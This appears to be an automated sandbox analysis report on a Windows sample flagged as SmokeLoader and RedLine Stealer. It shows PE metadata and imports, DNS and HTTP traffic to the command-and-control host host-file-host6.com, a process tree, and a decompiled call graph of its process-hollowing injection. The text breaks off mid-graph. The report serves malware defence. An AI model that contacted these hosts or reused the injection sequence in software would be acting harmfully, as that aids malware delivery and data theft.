                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xda4.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49300x40.text
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x16d560x16e00False0.5953295765027322data6.7023696076283805IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .data0x180000x2e2840x2b400False0.484662888367052data4.836772173500047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .lokeris0x470000xbb80xc00False0.008138020833333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .zoyan0x480000x2700x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x490000x1a5100x1a600False0.6376721712085308data6.242624809610504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x640000x1c120x1e00False0.3893229166666667data3.8825366238972383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        AFX_DIALOG_LAYOUT0x614500x2dataSlovakSlovakia
                        AFX_DIALOG_LAYOUT0x614380x2dataSlovakSlovakia
                        AFX_DIALOG_LAYOUT0x614400xcdataSlovakSlovakia
                        SUXUMOWUDAKOLA0x5f2d00x2107ASCII text, with very long lines (8455), with no line terminatorsSlovakSlovakia
                        RT_CURSOR0x614580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                        RT_CURSOR0x623000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                        RT_CURSOR0x62bd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SlovakSlovakia
                        RT_CURSOR0x62d000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SlovakSlovakia
                        RT_ICON0x499900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                        RT_ICON0x4a0580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                        RT_ICON0x4c6000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                        RT_ICON0x4ca980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                        RT_ICON0x4d9400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                        RT_ICON0x4e1e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                        RT_ICON0x4e7500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                        RT_ICON0x50cf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                        RT_ICON0x51da00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                        RT_ICON0x527280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                        RT_ICON0x52bf80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                        RT_ICON0x53aa00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                        RT_ICON0x543480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                        RT_ICON0x54a100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                        RT_ICON0x54f780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                        RT_ICON0x575200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                        RT_ICON0x585c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                        RT_ICON0x58a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                        RT_ICON0x599400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                        RT_ICON0x5a1e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                        RT_ICON0x5a8b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                        RT_ICON0x5ae180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                        RT_ICON0x5d3c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                        RT_ICON0x5e4680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                        RT_ICON0x5edf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                        RT_STRING0x62fc80x542dataSlovakSlovakia
                        RT_ACCELERATOR0x613d80x40dataSlovakSlovakia
                        RT_GROUP_CURSOR0x62ba80x22dataSlovakSlovakia
                        RT_GROUP_CURSOR0x62db00x22dataSlovakSlovakia
                        RT_GROUP_ICON0x58a300x68dataSlovakSlovakia
                        RT_GROUP_ICON0x4ca680x30dataSlovakSlovakia
                        RT_GROUP_ICON0x52b900x68dataSlovakSlovakia
                        RT_GROUP_ICON0x5f2580x76dataSlovakSlovakia
                        RT_VERSION0x62dd80x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                        None0x614180xadataSlovakSlovakia
                        None0x614280xadataSlovakSlovakia
                        DLLImport
                        KERNEL32.dllFillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile
                        ADVAPI32.dllBackupEventLogW
                        Language of compilation systemCountry where language is spokenMap
                        SlovakSlovakia
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 9, 2022 10:57:02.208288908 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.234762907 CET804971884.21.172.159192.168.2.6
                        Dec 9, 2022 10:57:02.234988928 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.237436056 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.237474918 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.264326096 CET804971884.21.172.159192.168.2.6
                        Dec 9, 2022 10:57:02.354650021 CET804971884.21.172.159192.168.2.6
                        Dec 9, 2022 10:57:02.354938984 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.357903957 CET4971880192.168.2.684.21.172.159
                        Dec 9, 2022 10:57:02.386727095 CET804971884.21.172.159192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 9, 2022 10:57:02.137377977 CET6322953192.168.2.68.8.8.8
                        Dec 9, 2022 10:57:02.156404972 CET53632298.8.8.8192.168.2.6
                        Dec 9, 2022 10:57:02.368879080 CET6253853192.168.2.68.8.8.8
                        Dec 9, 2022 10:57:03.383023024 CET6253853192.168.2.68.8.8.8
                        Dec 9, 2022 10:57:04.449312925 CET6253853192.168.2.68.8.8.8
                        Dec 9, 2022 10:57:06.409364939 CET53625388.8.8.8192.168.2.6
                        Dec 9, 2022 10:57:07.409687996 CET53625388.8.8.8192.168.2.6
                        Dec 9, 2022 10:57:08.477850914 CET53625388.8.8.8192.168.2.6
                        TimestampSource IPDest IPChecksumCodeType
                        Dec 9, 2022 10:57:07.412796974 CET192.168.2.68.8.8.8cff9(Port unreachable)Destination Unreachable
                        Dec 9, 2022 10:57:08.478075027 CET192.168.2.68.8.8.8cff9(Port unreachable)Destination Unreachable
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 9, 2022 10:57:02.137377977 CET192.168.2.68.8.8.80xe31cStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:02.368879080 CET192.168.2.68.8.8.80x7334Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:03.383023024 CET192.168.2.68.8.8.80x7334Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:04.449312925 CET192.168.2.68.8.8.80x7334Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 9, 2022 10:57:02.156404972 CET8.8.8.8192.168.2.60xe31cNo error (0)host-file-host6.com84.21.172.159A (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:06.409364939 CET8.8.8.8192.168.2.60x7334Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:07.409687996 CET8.8.8.8192.168.2.60x7334Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                        Dec 9, 2022 10:57:08.477850914 CET8.8.8.8192.168.2.60x7334Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                        • hhsselotxu.net
                          • host-file-host6.com
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.64971884.21.172.15980C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Dec 9, 2022 10:57:02.237436056 CET42OUTPOST / HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Accept: */*
                        Referer: http://hhsselotxu.net/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                        Content-Length: 321
                        Host: host-file-host6.com
                        Dec 9, 2022 10:57:02.237474918 CET42OUTData Raw: 10 87 85 92 6d f5 d1 b5 b8 4b 0a 46 0b b8 e2 f8 44 13 a8 34 d7 46 6b ef cb e6 a9 81 fd a4 e7 81 68 c6 5e d6 19 1c b8 92 e1 af f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2f af af 18
                        Data Ascii: mKFD4Fkh^wmwu$f]d/IxfA;MHsRU?,CE#8Pq'a<zP|9Bf+ofJD)#uONh=h\M00xDqn ||VH>k`vAYb%bYY]
                        Dec 9, 2022 10:57:02.354650021 CET43INHTTP/1.1 200 OK
                        Server: nginx/1.20.2
                        Date: Fri, 09 Dec 2022 09:57:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: fYour IP blocked0


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:10:55:58
                        Start date:09/12/2022
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\file.exe
                        Imagebase:0x400000
                        File size:391680 bytes
                        MD5 hash:0D810E582A95DEBFF5E1A72A76C602C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:low

                        Target ID:1
                        Start time:10:56:04
                        Start date:09/12/2022
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\file.exe
                        Imagebase:0x400000
                        File size:391680 bytes
                        MD5 hash:0D810E582A95DEBFF5E1A72A76C602C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:low

                        Target ID:2
                        Start time:10:56:10
                        Start date:09/12/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff647860000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high

                        Target ID:10
                        Start time:10:57:01
                        Start date:09/12/2022
                        Path:C:\Users\user\AppData\Roaming\rudwagu
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\rudwagu
                        Imagebase:0x400000
                        File size:391680 bytes
                        MD5 hash:0D810E582A95DEBFF5E1A72A76C602C9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        Target ID:11
                        Start time:10:57:13
                        Start date:09/12/2022
                        Path:C:\Users\user\AppData\Roaming\rudwagu
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\rudwagu
                        Imagebase:0x400000
                        File size:391680 bytes
                        MD5 hash:0D810E582A95DEBFF5E1A72A76C602C9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:low

                        Reset < >

                          Execution Graph

                          Execution Coverage:7.7%
                          Dynamic/Decrypted Code Coverage:3.1%
                          Signature Coverage:6.4%
                          Total number of Nodes:1670
                          Total number of Limit Nodes:26
                          execution_graph 10729 8e0000 10732 8e0630 10729->10732 10731 8e0005 10733 8e064c 10732->10733 10735 8e1577 10733->10735 10738 8e05b0 10735->10738 10741 8e05dc 10738->10741 10739 8e061e 10740 8e05e2 GetFileAttributesA 10740->10741 10741->10739 10741->10740 10743 8e0420 10741->10743 10744 8e04f3 10743->10744 10745 8e04ff CreateWindowExA 10744->10745 10746 8e04fa 10744->10746 10745->10746 10747 8e0540 PostMessageA 10745->10747 10746->10741 10748 8e055f 10747->10748 10748->10746 10750 8e0110 VirtualAlloc GetModuleFileNameA 10748->10750 10751 8e017d CreateProcessA 10750->10751 10752 8e0414 10750->10752 10751->10752 10754 8e025f VirtualFree VirtualAlloc GetThreadContext 10751->10754 10752->10748 10754->10752 10755 8e02a9 ReadProcessMemory 10754->10755 10756 8e02e5 VirtualAllocEx NtWriteVirtualMemory 10755->10756 10757 8e02d5 NtUnmapViewOfSection 10755->10757 10758 8e033b 10756->10758 10757->10756 10759 8e039d WriteProcessMemory SetThreadContext ResumeThread 10758->10759 10760 8e0350 NtWriteVirtualMemory 10758->10760 10761 8e03fb ExitProcess 10759->10761 10760->10758 8813 406f19 8850 408168 8813->8850 8815 406f25 GetStartupInfoW 8816 406f48 8815->8816 8851 4074c4 HeapCreate 8816->8851 8819 406f98 8853 40beb9 GetModuleHandleW 8819->8853 8823 406fa9 __RTC_Initialize 8887 40a6f1 8823->8887 8824 406ef0 _fast_error_exit 68 API calls 8824->8823 8826 406fb7 8827 406fc3 GetCommandLineW 8826->8827 8964 406be8 8826->8964 8902 40cb55 GetEnvironmentStringsW 8827->8902 8831 406fd2 8908 40caa7 GetModuleFileNameW 8831->8908 8833 406fdc 8834 406fe7 8833->8834 8835 406be8 __amsg_exit 68 API calls 8833->8835 8912 40c878 8834->8912 8835->8834 8838 406ff8 8925 406ca7 8838->8925 8840 406be8 __amsg_exit 68 API calls 8840->8838 8841 406fff 8842 406be8 __amsg_exit 68 API calls 8841->8842 8843 40700a __wwincmdln 8841->8843 8842->8843 8931 4058a1 8843->8931 8846 407039 8974 406e84 8846->8974 8849 40703e _puts 8850->8815 8852 406f8c 8851->8852 8852->8819 8956 406ef0 8852->8956 8854 40bed4 8853->8854 8855 40becd 8853->8855 8857 40c03c 8854->8857 8858 40bede GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8854->8858 8977 406bb8 8855->8977 9038 40bbd3 8857->9038 8860 40bf27 TlsAlloc 8858->8860 8863 406f9e 8860->8863 8864 40bf75 TlsSetValue 8860->8864 8863->8823 8863->8824 8864->8863 8865 40bf86 8864->8865 8981 406ea2 8865->8981 8870 40baa9 __encode_pointer 7 API calls 8871 40bfa6 8870->8871 8872 40baa9 __encode_pointer 7 API calls 8871->8872 8873 40bfb6 8872->8873 8874 40baa9 __encode_pointer 7 API calls 8873->8874 8875 40bfc6 8874->8875 9000 4074f4 8875->9000 8882 40bb24 __decode_pointer 6 API calls 8883 40c01a 8882->8883 8883->8857 8884 40c021 8883->8884 9020 40bc10 8884->9020 8886 40c029 GetCurrentThreadId 8886->8863 9366 408168 8887->9366 8889 40a6fd GetStartupInfoA 8890 40d6bc __calloc_crt 68 API calls 8889->8890 8897 40a71e 8890->8897 8891 40a93c _puts 8891->8826 8892 40a8b9 GetStdHandle 8896 40a883 8892->8896 8893 40d6bc __calloc_crt 68 API calls 8893->8897 8894 40a91e SetHandleCount 8894->8891 8895 40a8cb GetFileType 8895->8896 8896->8891 8896->8892 8896->8894 8896->8895 8900 40c782 __getstream InitializeCriticalSectionAndSpinCount 8896->8900 8897->8891 8897->8893 8897->8896 8898 40a806 8897->8898 8898->8891 8898->8896 8899 40a82f GetFileType 8898->8899 8901 40c782 __getstream InitializeCriticalSectionAndSpinCount 8898->8901 8899->8898 8900->8896 8901->8898 8903 40cb66 8902->8903 8904 40cb6a 8902->8904 8903->8831 8905 40d677 __malloc_crt 68 API calls 8904->8905 8907 40cb8b _realloc 8905->8907 8906 40cb92 FreeEnvironmentStringsW 8906->8831 8907->8906 8909 40cadc _wparse_cmdline 8908->8909 8910 40d677 __malloc_crt 68 API calls 8909->8910 8911 40cb1f _wparse_cmdline 8909->8911 8910->8911 8911->8833 8913 40c890 _wcslen 8912->8913 8917 406fed 8912->8917 8914 40d6bc __calloc_crt 68 API calls 8913->8914 8920 40c8b4 _wcslen 8914->8920 8915 40c919 8916 40617d __fclose_nolock 68 API calls 8915->8916 8916->8917 8917->8838 8917->8840 8918 40d6bc __calloc_crt 68 API calls 8918->8920 8919 40c93f 8921 40617d __fclose_nolock 68 API calls 8919->8921 8920->8915 8920->8917 8920->8918 8920->8919 8923 40c8fe 8920->8923 9367 4112eb 8920->9367 8921->8917 8923->8920 8924 40973f __invoke_watson 10 API calls 8923->8924 8924->8923 8926 406cb5 __IsNonwritableInCurrentImage 8925->8926 9376 40c1d0 8926->9376 8928 406cd3 __initterm_e 8930 406cf2 __IsNonwritableInCurrentImage __initterm 8928->8930 9380 40c16d 8928->9380 8930->8841 8932 4058cb GetLastError TransactNamedPipe 8931->8932 8932->8932 8933 4058e1 8932->8933 8934 405f9a LoadLibraryA 8933->8934 8935 405ede WriteConsoleA IsProcessInJob GetPriorityClass 8933->8935 9480 404ec6 8934->9480 9504 406707 8935->9504 8939 405f0b 8940 40617d __fclose_nolock 68 API calls 8939->8940 8941 405f26 8940->8941 8942 40625a _malloc 68 API calls 8941->8942 8943 405f2d 8942->8943 9527 406642 8943->9527 8945 405f40 9544 4065ef 8945->9544 8949 405f59 9565 406b33 8949->9565 8951 405f62 9578 404b2a 8951->9578 8955 405f77 8955->8934 8957 406f03 8956->8957 8958 406efe 8956->8958 8959 40835c __NMSG_WRITE 68 API calls 8957->8959 8960 408507 __FF_MSGBANNER 68 API calls 8958->8960 8961 406f0b 8959->8961 8960->8957 8962 406c3c _fast_error_exit 3 API calls 8961->8962 8963 406f15 8962->8963 8963->8819 8965 408507 __FF_MSGBANNER 68 API calls 8964->8965 8966 406bf2 8965->8966 8967 40835c __NMSG_WRITE 68 API calls 8966->8967 8968 406bfa 8967->8968 8969 40bb24 __decode_pointer 6 API calls 8968->8969 8970 406c05 8969->8970 8970->8827 8971 406e58 10703 406d2c 8971->10703 8973 406e69 8973->8846 8975 406d2c _doexit 68 API calls 8974->8975 8976 406e8f 8975->8976 8976->8849 8978 406bc3 Sleep GetModuleHandleW 8977->8978 8979 406be1 8978->8979 8980 406be5 8978->8980 8979->8978 8979->8980 8980->8854 9044 40bb1b 8981->9044 8983 406eaa __init_pointers __initp_misc_winsig 9047 40c3d1 8983->9047 8986 40baa9 __encode_pointer 7 API calls 8987 406ee6 8986->8987 8988 40baa9 TlsGetValue 8987->8988 8989 40bac1 8988->8989 8990 40bae2 GetModuleHandleW 8988->8990 8989->8990 8993 40bacb TlsGetValue 8989->8993 8991 40baf2 8990->8991 8992 40bafd GetProcAddress 8990->8992 8994 406bb8 __crt_waiting_on_module_handle 2 API calls 8991->8994 8995 40bada 8992->8995 8999 40bad6 8993->8999 8996 40baf8 8994->8996 8997 40bb15 8995->8997 8998 40bb0d RtlEncodePointer 8995->8998 8996->8992 8996->8997 8997->8870 8998->8997 8999->8990 8999->8995 9001 4074ff 9000->9001 9002 40752d 9001->9002 9050 40c782 9001->9050 9002->8857 9004 40bb24 TlsGetValue 9002->9004 9005 40bb3c 9004->9005 9006 40bb5d GetModuleHandleW 9004->9006 9005->9006 9007 40bb46 TlsGetValue 9005->9007 9008 40bb78 GetProcAddress 9006->9008 9009 40bb6d 9006->9009 9012 40bb51 9007->9012 9011 40bb55 9008->9011 9010 406bb8 __crt_waiting_on_module_handle 2 API calls 9009->9010 9013 40bb73 9010->9013 9011->8857 9014 40d6bc 9011->9014 9012->9006 9012->9011 9013->9008 9013->9011 9015 40d6c5 9014->9015 9017 40c000 9015->9017 9018 40d6e3 Sleep 9015->9018 9055 411374 9015->9055 9017->8857 9017->8882 9019 40d6f8 9018->9019 9019->9015 9019->9017 9345 408168 9020->9345 9022 40bc1c GetModuleHandleW 9023 40bc2c 9022->9023 9027 40bc32 9022->9027 9024 406bb8 __crt_waiting_on_module_handle 2 API calls 9023->9024 9024->9027 9025 40bc4a GetProcAddress GetProcAddress 9026 40bc6e 9025->9026 9028 407670 __lock 64 API calls 9026->9028 9027->9025 9027->9026 9029 40bc8d InterlockedIncrement 9028->9029 9346 40bce5 9029->9346 9032 407670 __lock 64 API calls 9033 40bcae 9032->9033 9349 40ef35 InterlockedIncrement 9033->9349 9035 40bccc 9361 40bcee 9035->9361 9037 40bcd9 _puts 9037->8886 9039 40bbe9 9038->9039 9040 40bbdd 9038->9040 9042 40bc0b 9039->9042 9043 40bbfd TlsFree 9039->9043 9041 40bb24 __decode_pointer 6 API calls 9040->9041 9041->9039 9042->9042 9043->9042 9045 40baa9 __encode_pointer 7 API calls 9044->9045 9046 40bb22 9045->9046 9046->8983 9048 40baa9 __encode_pointer 7 API calls 9047->9048 9049 406edc 9048->9049 9049->8986 9054 408168 9050->9054 9052 40c78e InitializeCriticalSectionAndSpinCount 9053 40c7d2 _puts 9052->9053 9053->9001 9054->9052 9056 411380 _puts 9055->9056 9057 411398 9056->9057 9067 4113b7 _memset 9056->9067 9068 40747b 9057->9068 9060 411429 RtlAllocateHeap 9060->9067 9064 4113ad _puts 9064->9015 9067->9060 9067->9064 9074 407670 9067->9074 9081 407e82 9067->9081 9087 411470 9067->9087 9090 40854f 9067->9090 9093 40bcf7 GetLastError 9068->9093 9070 407480 9071 409867 9070->9071 9072 40bb24 __decode_pointer 6 API calls 9071->9072 9073 409877 __invoke_watson 9072->9073 9075 407685 9074->9075 9076 407698 EnterCriticalSection 9074->9076 9140 4075ad 9075->9140 9076->9067 9078 40768b 9078->9076 9079 406be8 __amsg_exit 67 API calls 9078->9079 9080 407697 9079->9080 9080->9076 9082 407eb0 9081->9082 9083 407f52 9082->9083 9086 407f49 9082->9086 9333 4079e9 9082->9333 9083->9067 9086->9083 9340 407a99 9086->9340 9344 407596 LeaveCriticalSection 9087->9344 9089 411477 9089->9067 9091 40bb24 __decode_pointer 6 API calls 9090->9091 9092 40855f 9091->9092 9092->9067 9107 40bb9f TlsGetValue 9093->9107 9096 40bd64 SetLastError 9096->9070 9097 40d6bc __calloc_crt 65 API calls 9098 40bd22 9097->9098 9098->9096 9099 40bb24 __decode_pointer 6 API calls 9098->9099 9100 40bd3c 9099->9100 9101 40bd43 9100->9101 9102 40bd5b 9100->9102 9103 40bc10 __initptd 65 API calls 9101->9103 9112 40617d 9102->9112 9105 40bd4b GetCurrentThreadId 9103->9105 9105->9096 9106 40bd61 9106->9096 9108 40bbb4 9107->9108 9109 40bbcf 9107->9109 9110 40bb24 __decode_pointer 6 API calls 9108->9110 9109->9096 9109->9097 9111 40bbbf TlsSetValue 9110->9111 9111->9109 9113 406189 _puts 9112->9113 9114 4061c8 9113->9114 9115 406202 _puts _realloc 9113->9115 9117 407670 __lock 66 API calls 9113->9117 9114->9115 9116 4061dd HeapFree 9114->9116 9115->9106 9116->9115 9118 4061ef 9116->9118 9121 4061a0 ___sbh_find_block 9117->9121 9119 40747b _puts 66 API calls 9118->9119 9120 4061f4 GetLastError 9119->9120 9120->9115 9122 4061ba 9121->9122 9125 4076d3 9121->9125 9132 4061d3 9122->9132 9126 4079b4 9125->9126 9127 407712 9125->9127 9126->9122 9127->9126 9128 4078fe VirtualFree 9127->9128 9129 407962 9128->9129 9129->9126 9130 407971 VirtualFree HeapFree 9129->9130 9135 40d760 9130->9135 9139 407596 LeaveCriticalSection 9132->9139 9134 4061da 9134->9114 9136 40d778 9135->9136 9137 40d79f __VEC_memcpy 9136->9137 9138 40d7a7 9136->9138 9137->9138 9138->9126 9139->9134 9141 4075b9 _puts 9140->9141 9142 4075df 9141->9142 9166 408507 9141->9166 9150 4075ef _puts 9142->9150 9212 40d677 9142->9212 9148 407610 9153 407670 __lock 68 